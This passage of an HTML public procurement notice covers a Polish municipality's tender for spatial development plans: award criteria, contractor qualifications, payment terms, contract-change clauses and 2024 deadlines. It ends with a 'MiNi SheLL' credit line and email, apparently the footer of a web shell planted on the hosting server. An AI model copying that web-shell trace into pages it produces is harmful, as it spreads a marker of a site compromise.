wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury/rachunku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek dotyczący zdolności do występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek dotyczący sytuacji ekonomicznej lub finansowej oraz wykaże, że jest ubezpieczony od odpowiedzialności cywilnej (suma gwarancyjna co najmniej 100 000,00 zł słownie: sto tysięcy złotych 00/100) w zakresie prowadzonej działalności gospodarczej. Okres ważności polisy lub innego dokumentu ubezpieczenia musi obejmować co najmniej przewidziany przez zamawiającego w SWZ okres realizacji zadania. Jeżeli ważność polisy wygasa przed terminem wykonania zamówienia, Wykonawca winien dołączyć do oferty oświadczenie o przedłożeniu Zamawiającemu aktualnego dokumentu ubezpieczenia niezwłocznie po wygaśnięciu polisy/innego dokumentu ubezpieczenia.<br/>4)	zdolności technicznej lub zawodowej:<br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy, że spełnia warunek udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej oraz:<br/>a)	wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie usługi polegające na sporządzeniu miejscowego planu zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania przestrzennego dla obszaru o powierzchni nie mniejszej niż 80 ha; przez sporządzenie miejscowego planu lub studium uwarunkowań i kierunków zagospodarowania przestrzennego uznaje się jego opracowanie, uchwalenie, opublikowanie w dzienniku urzędowym (dotyczy miejscowego planu) oraz niewydanie przez wojewodę rozstrzygnięcia nadzorczego;<br/>b)	dysponuje co najmniej niżej wymienionymi osobami:<br/>	jedną osobą, która będzie pełniła funkcję głównego projektanta, która spełnia warunki określone w art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Z 2023 r., poz. 977 z późn. zm.) – Główny Projektant,<br/>	jedną osobą, która będzie pełniła funkcję specjalisty ds. oceny odziaływania na środowisko, która spełnia warunki określone w art. 74a ust. 2 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz w ocenach oddziaływania na środowisko (Dz. U. z 2023 r., poz. 1094 z późn. zm.),<br/>	jedną osobą skierowaną do opracowania wniosków o wyrażenie zgody na zmianę przeznaczenia gruntów rolnych na cele nierolnicze do miejscowego planu zagospodarowania przestrzennego.<br/>	jedną osobą skierowaną do opracowania wniosków o wyrażenie zgody na zmianę przeznaczenia gruntów leśnych na cele nieleśne do miejscowego planu zagospodarowania przestrzennego. <br/>3.	W przypadku Wykonawców zagranicznych, w stosunku do osób, od których wymagane <br/>są uprawnienia budowlane zgodnie z ustawą Prawo budowlane, Zamawiający dopuszcza kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane (Dz. U. z 2023 r., poz. 682 z późn. zm.)<br/>4.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>5. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2)	dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>3)	wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert – wg załącznika nr 5 do SWZ;<br/>4)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru załącznik nr 6 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> § 6 ust. 2. projektu umowy:<br/>Strony postanawiają, że wypłata wynagrodzenia płatna będzie w dwóch transzach oddzielnie dla każdego z zadań wyszczególniony w ust. 1 pkt 3 lit. a-f w następujący sposób: <br/>a)	pierwsza transza w wysokości 50% wynagrodzenia brutto przypisanego dla każdego z zadań wyszczególnionych w ust. 1 pkt 3 lit. a-f po wyłożeniu do publicznego wglądu projektu planu;<br/>b)	druga transza w wysokości 50% wynagrodzenia brutto przypisanego dla każdego z zadań wyszczególnionych w ust. 1 pkt 3 lit. a-f po zakończeniu realizacji całości przedmiotu umowy, o której mowa w § 5 ust. 3<br/>- z zastrzeżeniem ust. 8. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, niezależnie od przesłanek wynikających z art. 454-455 ustawy PZP, przewiduje możliwość wprowadzenia<br/>zmian do umowy na etapie realizacji, w tym między innymi zmiany terminu realizacji umowy lub jej poszczególnych etapów i<br/>wynagrodzenia umownego w odpowiednich oraz uzasadnionych przypadkach, jeżeli wystąpią następujące okoliczności:<br/>1) wystąpi konieczność zmiany zakresu przedmiotu umowy wynikająca z podjętych przez Radę Gminy Krościenko Wyżne<br/>uchwał oraz wniosków komisji Rady Gminy Krościenko Wyżne, w szczególności w zakresie podziału przygotowanego<br/>miejscowego planu zagospodarowania przestrzennego na dwa lub więcej planów lub podziału opracowanego projektu<br/>miejscowego planu zagospodarowania przestrzennego, z tym zastrzeżeniem, że wynagrodzenie Wykonawcy nie ulegnie<br/>zmianie;<br/>2) wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizację) ze strony Wykonawcy lub ze<br/>strony Zamawiającego;<br/>3) wystąpi konieczność zmiany terminu/ów realizacji przedmiotu umowy, poprzez jego skrócenie w przypadku zgodnej woli<br/>Stron, lub poprzez jego przedłużenie ze względu na przyczyny leżące po stronie Zamawiającego dotyczące w szczególności<br/>braku udostępnienia Wykonawcy materiałów lub informacji bądź podjęcia decyzji zależnych od Zamawiającego, a<br/>niezbędnych do realizacji przedmiotu umowy, jak również w przypadku zaistnienia okoliczności niezależnych od Stron i<br/>niezawinionych przez Wykonawcę, a związanych z opóźnieniem w uzyskaniu od stosownych instytucji i organów<br/>niezbędnych uzgodnień, opinii itp., w terminach instrukcyjnych bądź obligatoryjnych wynikających z powszechnie<br/>obowiązujących przepisów prawa oraz w przypadku zaistnienia innych niezawinionych przez Strony przyczyn<br/>spowodowanych przez siłę wyższą;<br/>4) wystąpi konieczność zmiany postanowień umowy w związku z wydaniem rozstrzygnięcia nadzorczego Wojewody<br/>Podkarpackiego w odniesieniu do zapisów zawartych w uchwałach w sprawie uchwalenia miejscowych planów<br/>zagospodarowania przestrzennego Gminy Krościenko Wyżne, o których mowa w § 1 ust. 1;<br/>5) wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wprowadzenia, aby możliwe było zakończenie<br/>opracowania, a nie można było ich przewidzieć w chwili zawarcia umowy oraz są korzystne dla Zamawiającego.<br/>2. W przypadkach określonych w umowie przedłużenie terminu wykonania przedmiotu umowy może nastąpić o czas<br/>niezbędny do jego wykonania, jednak nie dłużej niż o okres trwania przeszkody uniemożliwiającej wykonywanie przedmiotu<br/>umowy. Przedłużenie terminu Zamawiający warunkuje złożeniem przez Wykonawcę stosownego wniosku o sporządzenie<br/>aneksu do umowy wraz z powołaniem się na podstawę zmiany umowy i uzasadnieniem wniosku opisującym okoliczności3. Zamawiający przewiduje możliwość zmiany umowy w przypadku, gdy wystąpi konieczność wprowadzenia zmian innych<br/>niż określone w ustępach powyżej, które są niezbędne do wprowadzenia, aby było możliwe zakończenie opracowania, a nie<br/>można było ich przewidzieć w chwili zawarcia umowy. W takim przypadku Strony mogą zmienić takie elementy umowy, na<br/>które powyższe okoliczności mają wpływ, w tym również mogą dokonać zmiany terminu zakończenia wykonania przedmiotu<br/>umowy. Powyższa zmiana nie może skutkować wykroczeniem poza określenie przedmiotu zamówienia zawartego w SWZ.<br/>4. Zamawiający przewiduje możliwość zmiany umowy i waloryzacji wynagrodzenia zgodnie z zapisami § 13 niniejszej<br/>umowy.<br/>5. Zmiana umowy wymaga formy pisemnej pod rygorem nieważności za wyjątkiem zmiany harmonogramu wykonania usług<br/>w przypadku jeżeli wynika on z treści oferty lub zostanie uzgodniony przez Strony przed podpisaniem umowy, który może<br/>być zmieniany na bieżąco i roboczo w formie pisemnej lub elektronicznej przez osoby wskazane w treści umowy jako<br/>upoważnione do kontaktów lub nadzoru z ramienia Stron umowy, pod warunkiem iż zmiany nie prowadzą do zmiany<br/>wysokości wynagrodzenia Wykonawcy lub terminu zakończenia realizacji umowy lub zasad płatności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem:</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-05 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com